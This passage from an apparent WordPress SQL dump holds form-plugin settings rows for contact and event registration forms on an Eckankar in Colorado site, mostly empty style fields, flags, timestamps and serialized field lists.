s_color',''),(1166,33,'row_styles_height','','row_styles_height',''),(1167,33,'row_styles_width','','row_styles_width',''),(1168,33,'row_styles_font-size','','row_styles_font-size',''),(1169,33,'row_styles_margin','','row_styles_margin',''),(1170,33,'row_styles_padding','','row_styles_padding',''),(1171,33,'row_styles_display','','row_styles_display',''),(1172,33,'row_styles_show_advanced_css','0','row_styles_show_advanced_css','0'),(1173,33,'row_styles_advanced','','row_styles_advanced',''),(1174,33,'row-odd_styles_background-color','','row-odd_styles_background-color',''),(1175,33,'row-odd_styles_border','','row-odd_styles_border',''),(1176,33,'row-odd_styles_border-style','','row-odd_styles_border-style',''),(1177,33,'row-odd_styles_border-color','','row-odd_styles_border-color',''),(1178,33,'row-odd_styles_color','','row-odd_styles_color',''),(1179,33,'row-odd_styles_height','','row-odd_styles_height',''),(1180,33,'row-odd_styles_width','','row-odd_styles_width',''),(1181,33,'row-odd_styles_font-size','','row-odd_styles_font-size',''),(1182,33,'row-odd_styles_margin','','row-odd_styles_margin',''),(1183,33,'row-odd_styles_padding','','row-odd_styles_padding',''),(1184,33,'row-odd_styles_display','','row-odd_styles_display',''),(1185,33,'row-odd_styles_show_advanced_css','0','row-odd_styles_show_advanced_css','0'),(1186,33,'row-odd_styles_advanced','','row-odd_styles_advanced',''),(1187,33,'success-msg_styles_background-color','','success-msg_styles_background-color',''),(1188,33,'success-msg_styles_border','','success-msg_styles_border',''),(1189,33,'success-msg_styles_border-style','','success-msg_styles_border-style',''),(1190,33,'success-msg_styles_border-color','','success-msg_styles_border-color',''),(1191,33,'success-msg_styles_color','','success-msg_styles_color',''),(1192,33,'success-msg_styles_height','','success-msg_styles_height',''),(1193,33,'success-msg_styles_width','','success-msg_styles_width',''),(1194,33,'success-msg_styles_font-size','','success-msg_styles_font-size',''),(1195,33,'success-msg_styles_margin','','success-msg_styles_margin',''),(1196,33,'success-msg_styles_padding','','success-msg_styles_padding',''),(1197,33,'success-msg_styles_display','','success-msg_styles_display',''),(1198,33,'success-msg_styles_show_advanced_css','0','success-msg_styles_show_advanced_css','0'),(1199,33,'success-msg_styles_advanced','','success-msg_styles_advanced',''),(1200,33,'error_msg_styles_background-color','','error_msg_styles_background-color',''),(1201,33,'error_msg_styles_border','','error_msg_styles_border',''),(1202,33,'error_msg_styles_border-style','','error_msg_styles_border-style',''),(1203,33,'error_msg_styles_border-color','','error_msg_styles_border-color',''),(1204,33,'error_msg_styles_color','','error_msg_styles_color',''),(1205,33,'error_msg_styles_height','','error_msg_styles_height',''),(1206,33,'error_msg_styles_width','','error_msg_styles_width',''),(1207,33,'error_msg_styles_font-size','','error_msg_styles_font-size',''),(1208,33,'error_msg_styles_margin','','error_msg_styles_margin',''),(1209,33,'error_msg_styles_padding','','error_msg_styles_padding',''),(1210,33,'error_msg_styles_display','','error_msg_styles_display',''),(1211,33,'error_msg_styles_show_advanced_css','0','error_msg_styles_show_advanced_css','0'),(1212,33,'error_msg_styles_advanced','','error_msg_styles_advanced',''),(1213,34,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(1214,34,'clear_complete','1','clear_complete','1'),(1215,34,'hide_complete','1','hide_complete','1'),(1216,34,'show_title','0','show_title','0'),(1217,34,'status','','status',''),(1218,34,'append_page','','append_page',''),(1219,34,'ajax','0','ajax','0'),(1220,34,'logged_in','0','logged_in','0'),(1221,34,'not_logged_in_msg','','not_logged_in_msg',''),(1222,34,'sub_limit_number','','sub_limit_number',''),(1223,34,'sub_limit_msg','','sub_limit_msg',''),(1224,34,'last_sub','36','last_sub','36'),(1225,34,'title','Eckankar In Colorado Contact Form',NULL,NULL),(1226,34,'conditions','a:0:{}','conditions','a:0:{}'),(1227,34,'created_at','2019-09-20 19:37:28','created_at','2019-09-20 19:37:28'),(1228,34,'default_label_pos','above','default_label_pos','above'),(1229,34,'seq_num',NULL,'seq_num',NULL),(1230,34,'objectType','Form Setting','objectType','Form Setting'),(1231,34,'editActive','1','editActive','1'),(1232,34,'allow_public_link','0','allow_public_link','0'),(1233,34,'embed_form','','embed_form',''),(1234,34,'wrapper_class','','wrapper_class',''),(1235,34,'element_class','','element_class',''),(1236,34,'key','','key',''),(1237,34,'add_submit','1','add_submit','1'),(1238,34,'currency','','currency',''),(1239,34,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1240,34,'calculations','a:0:{}','calculations','a:0:{}'),(1241,34,'formContentData','a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663800814752\";i:9;s:10:\"submit_278\";}','formContentData','a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663800814752\";i:9;s:10:\"submit_278\";}'),(1242,34,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1243,34,'changeDateErrorMsg','','changeDateErrorMsg',''),(1244,34,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1245,34,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1246,34,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1247,34,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1248,34,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1249,34,'validateRequiredField','','validateRequiredField',''),(1250,34,'honeypotHoneypotError','','honeypotHoneypotError',''),(1251,34,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1252,34,'drawerDisabled','','drawerDisabled',''),(1253,34,'_seq_num','8','_seq_num','8'),(1254,32,'_seq_num','5','_seq_num','5'),(1255,20,'_seq_num','6','_seq_num','6'),(1256,17,'_seq_num','26','_seq_num','26'),(1257,35,'objectType','Form Setting','objectType','Form Setting'),(1258,35,'editActive','1','editActive','1'),(1259,35,'title','Eckankar In Colorado Contact Form','title','Eckankar In Colorado Contact Form'),(1260,35,'created_at','2019-07-15 14:05:48','created_at','2019-07-15 14:05:48'),(1261,35,'default_label_pos','above','default_label_pos','above'),(1262,35,'show_title','0','show_title','0'),(1263,35,'clear_complete','1','clear_complete','1'),(1264,35,'hide_complete','1','hide_complete','1'),(1265,35,'logged_in','0','logged_in','0'),(1266,35,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(1267,35,'status','','status',''),(1268,35,'append_page','','append_page',''),(1269,35,'ajax','0','ajax','0'),(1270,35,'not_logged_in_msg','','not_logged_in_msg',''),(1271,35,'sub_limit_number','','sub_limit_number',''),(1272,35,'sub_limit_msg','','sub_limit_msg',''),(1273,35,'last_sub','36','last_sub','36'),(1274,35,'conditions','a:0:{}','conditions','a:0:{}'),(1275,35,'wrapper_class','','wrapper_class',''),(1276,35,'element_class','','element_class',''),(1277,35,'key','','key',''),(1278,35,'add_submit','1','add_submit','1'),(1279,35,'currency','','currency',''),(1280,35,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1281,35,'calculations','a:0:{}','calculations','a:0:{}'),(1282,35,'formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663797829803\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663797829803\";i:8;s:10:\"submit_278\";}'),(1283,35,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1284,35,'changeDateErrorMsg','','changeDateErrorMsg',''),(1285,35,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1286,35,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1287,35,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1288,35,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1289,35,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1290,35,'validateRequiredField','','validateRequiredField',''),(1291,35,'honeypotHoneypotError','','honeypotHoneypotError',''),(1292,35,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1293,35,'drawerDisabled','','drawerDisabled',''),(1294,35,'_seq_num','51','_seq_num','51'),(1336,35,'seq_num',NULL,'seq_num',NULL),(1337,35,'allow_public_link','0','allow_public_link','0'),(1338,35,'embed_form','','embed_form',''),(1375,38,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(1376,38,'clear_complete','1','clear_complete','1'),(1377,38,'hide_complete','1','hide_complete','1'),(1378,38,'show_title','0','show_title','0'),(1379,38,'status','','status',''),(1380,38,'append_page','','append_page',''),(1381,38,'ajax','0','ajax','0'),(1382,38,'logged_in','0','logged_in','0'),(1383,38,'not_logged_in_msg','','not_logged_in_msg',''),(1384,38,'sub_limit_number','','sub_limit_number',''),(1385,38,'sub_limit_msg','','sub_limit_msg',''),(1386,38,'last_sub','36','last_sub','36'),(1387,38,'title','Eckankar In Colorado Contact Form',NULL,NULL),(1388,38,'conditions','a:0:{}','conditions','a:0:{}'),(1389,38,'created_at','2020-12-08 15:42:53','created_at','2020-12-08 15:42:53'),(1390,38,'default_label_pos','above','default_label_pos','above'),(1391,38,'seq_num',NULL,'seq_num',NULL),(1392,38,'objectType','Form Setting','objectType','Form Setting'),(1393,38,'editActive','1','editActive','1'),(1394,38,'wrapper_class','','wrapper_class',''),(1395,38,'element_class','','element_class',''),(1396,38,'key','','key',''),(1397,38,'add_submit','1','add_submit','1'),(1398,38,'currency','','currency',''),(1399,38,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1400,38,'calculations','a:0:{}','calculations','a:0:{}'),(1401,38,'formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}'),(1402,38,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1403,38,'changeDateErrorMsg','','changeDateErrorMsg',''),(1404,38,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1405,38,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1406,38,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1407,38,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1408,38,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1409,38,'validateRequiredField','','validateRequiredField',''),(1410,38,'honeypotHoneypotError','','honeypotHoneypotError',''),(1411,38,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1412,38,'drawerDisabled','','drawerDisabled',''),(1413,38,'allow_public_link','0','allow_public_link','0'),(1414,38,'embed_form','','embed_form',''),(1415,38,'_seq_num','5','_seq_num','5'),(1416,39,'objectType','Form Setting','objectType','Form Setting'),(1417,39,'editActive','1','editActive','1'),(1418,39,'title','Eckankar In Colorado Contact Form',NULL,NULL),(1419,39,'created_at','2021-01-28 10:29:47','created_at','2021-01-28 10:29:47'),(1420,39,'default_label_pos','above','default_label_pos','above'),(1421,39,'show_title','0','show_title','0'),(1422,39,'clear_complete','1','clear_complete','1'),(1423,39,'hide_complete','1','hide_complete','1'),(1424,39,'logged_in','0','logged_in','0'),(1425,39,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(1426,39,'status','','status',''),(1427,39,'append_page','','append_page',''),(1428,39,'ajax','0','ajax','0'),(1429,39,'not_logged_in_msg','','not_logged_in_msg',''),(1430,39,'sub_limit_number','','sub_limit_number',''),(1431,39,'sub_limit_msg','','sub_limit_msg',''),(1432,39,'last_sub','36','last_sub','36'),(1433,39,'conditions','a:0:{}','conditions','a:0:{}'),(1434,39,'wrapper_class','','wrapper_class',''),(1435,39,'element_class','','element_class',''),(1436,39,'key','','key',''),(1437,39,'add_submit','1','add_submit','1'),(1438,39,'currency','','currency',''),(1439,39,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1440,39,'calculations','a:0:{}','calculations','a:0:{}'),(1441,39,'formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800560932\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800560932\";i:8;s:10:\"submit_278\";}'),(1442,39,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1443,39,'changeDateErrorMsg','','changeDateErrorMsg',''),(1444,39,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1445,39,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1446,39,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1447,39,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1448,39,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1449,39,'validateRequiredField','','validateRequiredField',''),(1450,39,'honeypotHoneypotError','','honeypotHoneypotError',''),(1451,39,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1452,39,'drawerDisabled','','drawerDisabled',''),(1453,39,'seq_num',NULL,'seq_num',NULL),(1454,39,'allow_public_link','0','allow_public_link','0'),(1455,39,'embed_form','','embed_form',''),(1456,39,'_seq_num','8','_seq_num','8'),(1457,18,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1458,18,'changeDateErrorMsg','','changeDateErrorMsg',''),(1459,18,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1460,18,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1461,18,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1462,18,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1463,18,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1464,18,'validateRequiredField','','validateRequiredField',''),(1465,18,'honeypotHoneypotError','','honeypotHoneypotError',''),(1466,18,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1467,18,'drawerDisabled','','drawerDisabled',''),(1468,8,'repeatable_fieldsets','','repeatable_fieldsets',''),(1585,41,'objectType','Form Setting','objectType','Form Setting'),(1586,41,'editActive','1','editActive','1'),(1587,41,'date_updated','2017-07-04 18:10:50','date_updated','2017-07-04 18:10:50'),(1588,41,'clear_complete','1','clear_complete','1'),(1589,41,'hide_complete','1','hide_complete','1'),(1590,41,'show_title','0','show_title','0'),(1591,41,'status','','status',''),(1592,41,'append_page','','append_page',''),(1593,41,'ajax','0','ajax','0'),(1594,41,'logged_in','0','logged_in','0'),(1595,41,'not_logged_in_msg','','not_logged_in_msg',''),(1596,41,'sub_limit_number','','sub_limit_number',''),(1597,41,'sub_limit_msg','','sub_limit_msg',''),(1598,41,'last_sub','4','last_sub','4'),(1599,41,'title','Central Colorado Leadership Communications',NULL,NULL),(1600,41,'conditions','a:0:{}','conditions','a:0:{}'),(1601,41,'default_label_pos','above','default_label_pos','above'),(1602,41,'wrapper_class','','wrapper_class',''),(1603,41,'element_class','','element_class',''),(1604,41,'key','','key',''),(1605,41,'add_submit','1','add_submit','1'),(1606,41,'currency','','currency',''),(1607,41,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1608,41,'calculations','a:0:{}','calculations','a:0:{}'),(1609,41,'formContentData','a:11:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:9:\"submit_31\";}','formContentData','a:11:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:9:\"submit_31\";}'),(2393,62,'objectType','Form Setting','objectType','Form Setting'),(1610,41,'repeatable_fieldsets','','repeatable_fieldsets',''),(1611,41,'created_at','2021-02-21 13:50:21','created_at','2021-02-21 13:50:21'),(1612,41,'seq_num',NULL,'seq_num',NULL),(1613,41,'allow_public_link','0','allow_public_link','0'),(1614,41,'embed_form','','embed_form',''),(1615,41,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1616,41,'changeDateErrorMsg','','changeDateErrorMsg',''),(1617,41,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1618,41,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1619,41,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1620,41,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1621,41,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1622,41,'validateRequiredField','','validateRequiredField',''),(1623,41,'honeypotHoneypotError','','honeypotHoneypotError',''),(1624,41,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1625,41,'drawerDisabled','','drawerDisabled',''),(1626,41,'_seq_num','8','_seq_num','8'),(1628,42,'objectType','Form Setting','objectType','Form Setting'),(1629,42,'editActive','1','editActive','1'),(1630,42,'title','Event Registration','title','Event Registration'),(1631,42,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(1632,42,'default_label_pos','above','default_label_pos','above'),(1633,42,'show_title','0','show_title','0'),(1634,42,'clear_complete','1','clear_complete','1'),(1635,42,'hide_complete','1','hide_complete','1'),(1636,42,'logged_in','0','logged_in','0'),(1637,42,'key','','key',''),(1638,42,'wrapper_class','','wrapper_class',''),(1639,42,'element_class','','element_class',''),(1640,42,'add_submit','0','add_submit','0'),(1641,42,'not_logged_in_msg','','not_logged_in_msg',''),(1642,42,'sub_limit_number','','sub_limit_number',''),(1643,42,'sub_limit_msg','','sub_limit_msg',''),(1644,42,'calculations','a:0:{}','calculations','a:0:{}'),(1645,42,'formContentData','a:6:{i:0;s:37:\"register_for_this_event_1614289627888\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:8:\"register\";}','formContentData','a:6:{i:0;s:37:\"register_for_this_event_1614289627888\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:8:\"register\";}'),(1646,42,'currency','','currency',''),(1647,42,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1648,42,'repeatable_fieldsets','','repeatable_fieldsets',''),(1649,42,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1650,42,'changeDateErrorMsg','','changeDateErrorMsg',''),(1651,42,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1652,42,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1653,42,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1654,42,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1655,42,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1656,42,'validateRequiredField','','validateRequiredField',''),(1657,42,'honeypotHoneypotError','','honeypotHoneypotError',''),(1658,42,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1659,42,'drawerDisabled','','drawerDisabled',''),(1692,42,'seq_num',NULL,'seq_num',NULL),(1693,42,'allow_public_link','0','allow_public_link','0'),(1694,42,'embed_form','','embed_form',''),(1695,24,'repeatable_fieldsets','','repeatable_fieldsets',''),(1696,9,'repeatable_fieldsets','','repeatable_fieldsets',''),(1697,2,'repeatable_fieldsets','','repeatable_fieldsets',''),(1698,2,'_seq_num','2','_seq_num','2'),(1699,5,'repeatable_fieldsets','','repeatable_fieldsets',''),(1700,6,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1701,6,'changeDateErrorMsg','','changeDateErrorMsg',''),(1702,6,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1703,6,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1704,6,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1705,6,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1706,6,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1707,6,'validateRequiredField','','validateRequiredField',''),(1708,6,'honeypotHoneypotError','','honeypotHoneypotError',''),(1709,6,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1710,6,'repeatable_fieldsets','','repeatable_fieldsets',''),(1711,6,'drawerDisabled','','drawerDisabled',''),(1712,32,'repeatable_fieldsets','','repeatable_fieldsets',''),(1713,10,'repeatable_fieldsets','','repeatable_fieldsets',''),(1714,35,'repeatable_fieldsets','','repeatable_fieldsets',''),(1715,11,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1716,11,'changeDateErrorMsg','','changeDateErrorMsg',''),(1717,11,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1718,11,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1719,11,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1720,11,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1721,11,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1722,11,'validateRequiredField','','validateRequiredField',''),(1723,11,'honeypotHoneypotError','','honeypotHoneypotError',''),(1724,11,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1725,11,'repeatable_fieldsets','','repeatable_fieldsets',''),(1726,11,'drawerDisabled','','drawerDisabled',''),(1727,12,'repeatable_fieldsets','','repeatable_fieldsets',''),(1728,13,'repeatable_fieldsets','','repeatable_fieldsets',''),(1729,14,'repeatable_fieldsets','','repeatable_fieldsets',''),(1730,15,'repeatable_fieldsets','','repeatable_fieldsets',''),(1731,16,'repeatable_fieldsets','','repeatable_fieldsets',''),(1732,17,'repeatable_fieldsets','','repeatable_fieldsets',''),(1733,18,'repeatable_fieldsets','','repeatable_fieldsets',''),(1734,39,'repeatable_fieldsets','','repeatable_fieldsets',''),(1735,19,'repeatable_fieldsets','','repeatable_fieldsets',''),(1736,20,'repeatable_fieldsets','','repeatable_fieldsets',''),(1737,22,'repeatable_fieldsets','','repeatable_fieldsets',''),(1738,23,'repeatable_fieldsets','','repeatable_fieldsets',''),(1739,25,'repeatable_fieldsets','','repeatable_fieldsets',''),(1740,34,'repeatable_fieldsets','','repeatable_fieldsets',''),(1741,4,'repeatable_fieldsets','','repeatable_fieldsets',''),(1742,44,'objectType','Form Setting','objectType','Form Setting'),(1743,44,'editActive','1','editActive','1'),(1744,44,'title','Event Registration','title','Event Registration'),(1745,44,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(1746,44,'default_label_pos','above','default_label_pos','above'),(1747,44,'show_title','0','show_title','0'),(1748,44,'clear_complete','1','clear_complete','1'),(1749,44,'hide_complete','1','hide_complete','1'),(1750,44,'logged_in','0','logged_in','0'),(1751,44,'key','','key',''),(1752,44,'wrapper_class','','wrapper_class',''),(1753,44,'element_class','','element_class',''),(1754,44,'add_submit','0','add_submit','0'),(1755,44,'not_logged_in_msg','','not_logged_in_msg',''),(1756,44,'sub_limit_number','','sub_limit_number',''),(1757,44,'sub_limit_msg','','sub_limit_msg',''),(1758,44,'calculations','a:0:{}','calculations','a:0:{}'),(1759,44,'formContentData','a:7:{i:0;s:45:\"sound_of_soul_zoom_registration_1617130354644\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}','formContentData','a:7:{i:0;s:45:\"sound_of_soul_zoom_registration_1617130354644\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}'),(1760,44,'currency','','currency',''),(1761,44,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1762,44,'repeatable_fieldsets','','repeatable_fieldsets',''),(1763,44,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1764,44,'changeDateErrorMsg','','changeDateErrorMsg',''),(1765,44,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1766,44,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1767,44,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1768,44,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1769,44,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1770,44,'validateRequiredField','','validateRequiredField',''),(1771,44,'honeypotHoneypotError','','honeypotHoneypotError',''),(1772,44,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1773,44,'drawerDisabled','','drawerDisabled',''),(1774,44,'seq_num',NULL,'seq_num',NULL),(1775,44,'allow_public_link','0','allow_public_link','0'),(1776,44,'embed_form','','embed_form',''),(1777,21,'repeatable_fieldsets','','repeatable_fieldsets',''),(1813,44,'_seq_num','24','_seq_num','24'),(1814,38,'repeatable_fieldsets','','repeatable_fieldsets',''),(1815,46,'objectType','Form Setting','objectType','Form Setting'),(1816,46,'editActive','1','editActive','1'),(1817,46,'title','Event Registration',NULL,NULL),(1818,46,'created_at','2021-05-04 10:48:03','created_at','2021-05-04 10:48:03'),(1819,46,'default_label_pos','above','default_label_pos','above'),(1820,46,'show_title','0','show_title','0'),(1821,46,'clear_complete','1','clear_complete','1'),(1822,46,'hide_complete','1','hide_complete','1'),(1823,46,'logged_in','0','logged_in','0'),(1824,46,'key','','key',''),(1825,46,'wrapper_class','','wrapper_class',''),(1826,46,'element_class','','element_class',''),(1827,46,'add_submit','0','add_submit','0'),(1828,46,'not_logged_in_msg','','not_logged_in_msg',''),(1829,46,'sub_limit_number','','sub_limit_number',''),(1830,46,'sub_limit_msg','','sub_limit_msg',''),(1831,46,'calculations','a:0:{}','calculations','a:0:{}'),(1832,46,'formContentData','a:7:{i:0;s:54:\"eck_light_and_sound_service_registration_1620150522553\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}','formContentData','a:7:{i:0;s:54:\"eck_light_and_sound_service_registration_1620150522553\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}'),(1833,46,'currency','','currency',''),(1834,46,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1835,46,'repeatable_fieldsets','','repeatable_fieldsets',''),(1836,46,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1837,46,'changeDateErrorMsg','','changeDateErrorMsg',''),(1838,46,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1839,46,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1840,46,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1841,46,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1842,46,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1843,46,'validateRequiredField','','validateRequiredField',''),(1844,46,'honeypotHoneypotError','','honeypotHoneypotError',''),(1845,46,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1846,46,'drawerDisabled','','drawerDisabled',''),(1847,46,'seq_num',NULL,'seq_num',NULL),(1848,46,'allow_public_link','0','allow_public_link','0'),(1849,46,'embed_form','','embed_form',''),(1850,46,'_seq_num','54','_seq_num','54'),(1851,47,'objectType','Form Setting','objectType','Form Setting'),(1852,47,'editActive','','editActive',''),(1853,47,'title','Event Registration','title','Event Registration'),(1854,47,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(1855,47,'form_title','Event Registration','form_title','Event 